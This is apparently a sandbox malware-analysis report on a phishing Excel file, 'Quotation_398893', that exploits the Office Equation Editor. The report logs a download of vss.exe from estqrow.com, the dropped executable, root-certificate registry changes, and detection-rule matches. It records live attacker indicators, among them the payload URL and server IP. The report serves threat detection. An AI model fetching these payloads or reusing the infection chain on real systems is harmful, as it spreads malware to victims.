Source: Quotation_398893.xlam.xlsx |
Avira: detected |
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\vss[1].exe |
Virustotal: Detection: 6% |
Source: C:\Users\user\AppData\Local\Temp\opponbvew.exe |
Virustotal: Detection: 6% |
Source: Quotation_398893.xlam.xlsx |
ReversingLabs: Detection: 71% |
Source: Quotation_398893.xlam.xlsx |
Virustotal: Detection: 50% |
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE |
Network connect: IP: 154.38.177.76 Port: 443 |
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE |
Process created: C:\Users\user\AppData\Local\Temp\opponbvew.exe |
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE |
Process created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE "C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding |
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE |
File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll |
Source: unknown |
HTTPS traffic detected: 154.38.177.76:443 -> 192.168.2.22:49161 version: TLS 1.2 |
Source: |
Binary string: F:\Pendriver\programas\crc vb.net\Teste Ok\Teste Ok\obj\Debug\TesteOk.pdb source: EQNEDT32.EXE, 00000001.00000002.468050895.000000000036C000.00000004.00000020.00020000.00000000.sdmp, opponbvew.exe, 00000004.00000000.467095355.0000000000CD6000.00000008.00000001.01000000.00000004.sdmp, vss[1].exe.1.dr, opponbvew.exe.1.dr |
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE |
Process created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE |
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE |
Code function: 1_2_03610775 WinExec,ExitProcess, |
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE |
Code function: 1_2_036106C1 LoadLibraryW,URLDownloadToFileW, |
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE |
Code function: 1_2_0361072A URLDownloadToFileW, |
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE |
Code function: 1_2_03610649 URLDownloadToFileW, |
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE |
Code function: 1_2_036106DB URLDownloadToFileW, |
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE |
Code function: 1_2_03610795 ExitProcess, |
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE |
Code function: 1_2_03610614 ExitProcess, |
Source: C:\Users\user\AppData\Local\Temp\opponbvew.exe |
Code function: 4x nop then dec eax |
4_2_000007FE8B6F4201 |
Source: global traffic |
DNS query: name: estqrow.com |
Source: global traffic |
TCP traffic: 192.168.2.22:49161 -> 154.38.177.76:443 |
Source: global traffic |
TCP traffic: 154.38.177.76:443 -> 192.168.2.22:49161 |
Source: Joe Sandbox View |
ASN Name: COGENT-174US COGENT-174US |
Source: Joe Sandbox View |
JA3 fingerprint: 7dcce5b76c8b17472d024758970a406b |
Source: Network traffic |
Suricata IDS: 2019714 - Severity 2 - ET MALWARE Terse alphanumeric executable downloader high likelihood of being hostile : 192.168.2.22:49161 -> 154.38.177.76:443 |
Source: global traffic |
HTTP traffic detected: |
GET /rt/vss.exe HTTP/1.1
Accept: */*
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
Host: estqrow.com
Connection: Keep-Alive
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE |
File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\vss[1].exe |
Source: EQNEDT32.EXE, 00000001.00000002.468050895.000000000036C000.00000004.00000020.00020000.00000000.sdmp |
String found in binary or memory: www.login.yahoo.com0 equals www.yahoo.com (Yahoo) |
Source: global traffic |
DNS traffic detected: DNS query: estqrow.com |
Source: EQNEDT32.EXE, 00000001.00000002.468050895.000000000036C000.00000004.00000020.00020000.00000000.sdmp |
String found in binary or memory: http://crl.comodoca.com/AAACertificateServices.crl06 |
Source: EQNEDT32.EXE, 00000001.00000002.468050895.000000000036C000.00000004.00000020.00020000.00000000.sdmp |
String found in binary or memory: http://crl.comodoca.com/UTN-USERFirst-Hardware.crl06 |
Source: EQNEDT32.EXE, 00000001.00000002.468050895.000000000036C000.00000004.00000020.00020000.00000000.sdmp |
String found in binary or memory: http://crl.entrust.net/2048ca.crl0 |
Source: EQNEDT32.EXE, 00000001.00000002.468050895.000000000036C000.00000004.00000020.00020000.00000000.sdmp |
String found in binary or memory: http://crl.entrust.net/server1.crl0 |
Source: EQNEDT32.EXE, 00000001.00000002.468050895.000000000036C000.00000004.00000020.00020000.00000000.sdmp |
String found in binary or memory: http://crl.globalsign.net/root-r2.crl0 |
Source: EQNEDT32.EXE, 00000001.00000002.468050895.000000000036C000.00000004.00000020.00020000.00000000.sdmp |
String found in binary or memory: http://crl.pkioverheid.nl/DomOrganisatieLatestCRL-G2.crl0 |
Source: EQNEDT32.EXE, 00000001.00000002.468050895.000000000036C000.00000004.00000020.00020000.00000000.sdmp |
String found in binary or memory: http://crl.pkioverheid.nl/DomOvLatestCRL.crl0 |
Source: EQNEDT32.EXE, 00000001.00000002.468050895.000000000036C000.00000004.00000020.00020000.00000000.sdmp |
String found in binary or memory: http://ocsp.comodoca.com0 |
Source: EQNEDT32.EXE, 00000001.00000002.468050895.000000000036C000.00000004.00000020.00020000.00000000.sdmp |
String found in binary or memory: http://ocsp.comodoca.com0% |
Source: EQNEDT32.EXE, 00000001.00000002.468050895.000000000036C000.00000004.00000020.00020000.00000000.sdmp |
String found in binary or memory: http://ocsp.comodoca.com0- |
Source: EQNEDT32.EXE, 00000001.00000002.468050895.000000000036C000.00000004.00000020.00020000.00000000.sdmp |
String found in binary or memory: http://ocsp.comodoca.com0/ |
Source: EQNEDT32.EXE, 00000001.00000002.468050895.000000000036C000.00000004.00000020.00020000.00000000.sdmp |
String found in binary or memory: http://ocsp.comodoca.com05 |
Source: EQNEDT32.EXE, 00000001.00000002.468050895.000000000036C000.00000004.00000020.00020000.00000000.sdmp |
String found in binary or memory: http://ocsp.entrust.net03 |
Source: EQNEDT32.EXE, 00000001.00000002.468050895.000000000036C000.00000004.00000020.00020000.00000000.sdmp |
String found in binary or memory: http://ocsp.entrust.net0D |
Source: EQNEDT32.EXE, 00000001.00000002.468050895.000000000036C000.00000004.00000020.00020000.00000000.sdmp |
String found in binary or memory: http://www.digicert.com.my/cps.htm02 |
Source: EQNEDT32.EXE, 00000001.00000002.468050895.000000000036C000.00000004.00000020.00020000.00000000.sdmp |
String found in binary or memory: http://www.diginotar.nl/cps/pkioverheid0 |
Source: EQNEDT32.EXE, 00000001.00000002.468050895.0000000000314000.00000004.00000020.00020000.00000000.sdmp |
String found in binary or memory: https://estqrow.com/ |
Source: EQNEDT32.EXE, 00000001.00000002.468879887.0000000007210000.00000004.00000020.00020000.00000000.sdmp, EQNEDT32.EXE, 00000001.00000002.468050895.00000000002C4000.00000004.00000020.00020000.00000000.sdmp |
String found in binary or memory: https://estqrow.com/rt/vss.exe |
Source: EQNEDT32.EXE, 00000001.00000002.468879887.0000000007210000.00000004.00000020.00020000.00000000.sdmp |
String found in binary or memory: https://estqrow.com/rt/vss.exeC: |
Source: EQNEDT32.EXE, 00000001.00000002.468050895.00000000002DE000.00000004.00000020.00020000.00000000.sdmp |
String found in binary or memory: https://estqrow.com/rt/vss.exehhC: |
Source: EQNEDT32.EXE, 00000001.00000002.468180614.0000000003610000.00000004.00000020.00020000.00000000.sdmp |
String found in binary or memory: https://estqrow.com/rt/vss.exej |
Source: EQNEDT32.EXE, 00000001.00000002.468050895.000000000036C000.00000004.00000020.00020000.00000000.sdmp |
String found in binary or memory: https://secure.comodo.com/CPS0 |
Source: unknown |
Network traffic detected: HTTP traffic on port 49161 -> 443 |
Source: unknown |
Network traffic detected: HTTP traffic on port 443 -> 49161 |
Source: sheet1.xml, type: SAMPLE |
Matched rule: detects AutoLoad documents using LegacyDrawing Author: ditekSHen |
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE |
File created: C:\Users\user\AppData\Local\Temp\opponbvew.exe |
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE |
Memory allocated: 770B0000 page execute and read and write |
Source: Quotation_398893.xlam.xlsx |
OLE stream indicators for Word, Excel, PowerPoint, and Visio: all false |
Source: sheet1.xml, type: SAMPLE |
Matched rule: INDICATOR_XML_LegacyDrawing_AutoLoad_Document author = ditekSHen, description = detects AutoLoad documents using LegacyDrawing |
Source: classification engine |
Classification label: mal100.expl.winXLSX@4/4@1/1 |
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE |
File created: C:\Users\user\Desktop\~$Quotation_398893.xlam.xlsx |
Source: C:\Users\user\AppData\Local\Temp\opponbvew.exe |
Mutant created: NULL |
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE |
File created: C:\Users\user\AppData\Local\Temp\CVR8A54.tmp |
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE |
File read: C:\Users\desktop.ini |
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE |
Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers |
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE |
File read: C:\Windows\System32\drivers\etc\hosts |
Source: unknown |
Process created: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE "C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" /automation -Embedding |
|
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE |
Process created: C:\Users\user\AppData\Local\Temp\opponbvew.exe C:\Users\user\AppData\Local\Temp\opponbvew.exe |
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE |
Section loaded: wow64win.dll |
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE |
Section loaded: wow64cpu.dll |
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE |
Section loaded: msi.dll |
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE |
Section loaded: cryptsp.dll |
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE |
Section loaded: rpcrtremote.dll |
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE |
Section loaded: dwmapi.dll |
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE |
Section loaded: version.dll |
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE |
Section loaded: secur32.dll |
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE |
Section loaded: winhttp.dll |
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE |
Section loaded: webio.dll |
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE |
Section loaded: iphlpapi.dll |
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE |
Section loaded: winnsi.dll |
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE |
Section loaded: dnsapi.dll |
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE |
Section loaded: nlaapi.dll |
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE |
Section loaded: dhcpcsvc6.dll |
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE |
Section loaded: dhcpcsvc.dll |
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE |
Section loaded: rasadhlp.dll |
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE |
Section loaded: credssp.dll |
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE |
Section loaded: ncrypt.dll |
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE |
Section loaded: bcrypt.dll |
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE |
Section loaded: gpapi.dll |
Source: C:\Users\user\AppData\Local\Temp\opponbvew.exe |
Section loaded: version.dll |
Source: C:\Users\user\AppData\Local\Temp\opponbvew.exe |
Section loaded: vcruntime140_clr0400.dll |
Source: C:\Users\user\AppData\Local\Temp\opponbvew.exe |
Section loaded: ucrtbase_clr0400.dll |
Source: C:\Users\user\AppData\Local\Temp\opponbvew.exe |
Section loaded: bcrypt.dll |
Source: C:\Users\user\AppData\Local\Temp\opponbvew.exe |
Section loaded: cryptsp.dll |
Source: C:\Users\user\AppData\Local\Temp\opponbvew.exe |
Section loaded: dwmapi.dll |
Source: C:\Users\user\AppData\Local\Temp\opponbvew.exe |
Section loaded: rpcrtremote.dll |
Source: Window Recorder |
Window detected: More than 3 window changes detected |
Source: Quotation_398893.xlam.xlsx |
Initial sample: OLE zip file path = xl/media/image1.png |
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE |
Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Resiliency\StartupItems |
Source: Quotation_398893.xlam.xlsx |
Initial sample: OLE indicators vbamacros = False |
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE |
Code function: 1_2_0361006C push eax; ret |
1_2_0361006D |
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE |
Code function: 1_2_03610278 push edi; iretd |
1_2_0361027C |
Source: C:\Users\user\AppData\Local\Temp\opponbvew.exe |
Code function: 4_2_000007FE8B6F00BD pushad ; iretd |
4_2_000007FE8B6F00C1 |
Source: C:\Users\user\AppData\Local\Temp\opponbvew.exe |
Code function: 4_2_000007FE8B6F00CD pushad ; iretd |
4_2_000007FE8B6F00C1 |
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE |
Registry value created: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\3F728A35DE52B2C8994A4FB101A03B95E87B06C8 Blob |
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE |
Registry value created: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\12891DF7B048CD69D0196C8AD7A754C8A812A08C Blob |
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE |
Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\3F728A35DE52B2C8994A4FB101A03B95E87B06C8 Blob |
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE |
Process information set: NOOPENFILEERRORBOX |
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE |
Process information set: NOOPENFILEERRORBOX |
Source: C:\Users\user\AppData\Local\Temp\opponbvew.exe |
Process information set: NOOPENFILEERRORBOX |
Source: C:\Users\user\AppData\Local\Temp\opponbvew.exe |
Memory allocated: 130000 memory reserve | memory write watch |
Source: C:\Users\user\AppData\Local\Temp\opponbvew.exe |
Memory allocated: 1A610000 memory reserve | memory write watch |
Source: C:\Users\user\AppData\Local\Temp\opponbvew.exe |
Thread delayed: delay time: 922337203685477 |
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE TID: 3524 |
Thread sleep time: -240000s >= -30000s |
Source: C:\Users\user\AppData\Local\Temp\opponbvew.exe TID: 3744 |
Thread sleep time: -60000s >= -30000s |
Source: C:\Users\user\AppData\Local\Temp\opponbvew.exe TID: 3676 |
Thread sleep time: -922337203685477s >= -30000s |
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE |
Code function: 1_2_0361079C mov edx, dword ptr fs:[00000030h] |
Source: C:\Users\user\AppData\Local\Temp\opponbvew.exe |
Memory allocated: page read and write | page guard |
Source: C:\Users\user\AppData\Local\Temp\opponbvew.exe |
Queries volume information: C:\Users\user\AppData\Local\Temp\opponbvew.exe VolumeInformation |
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE |
Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid |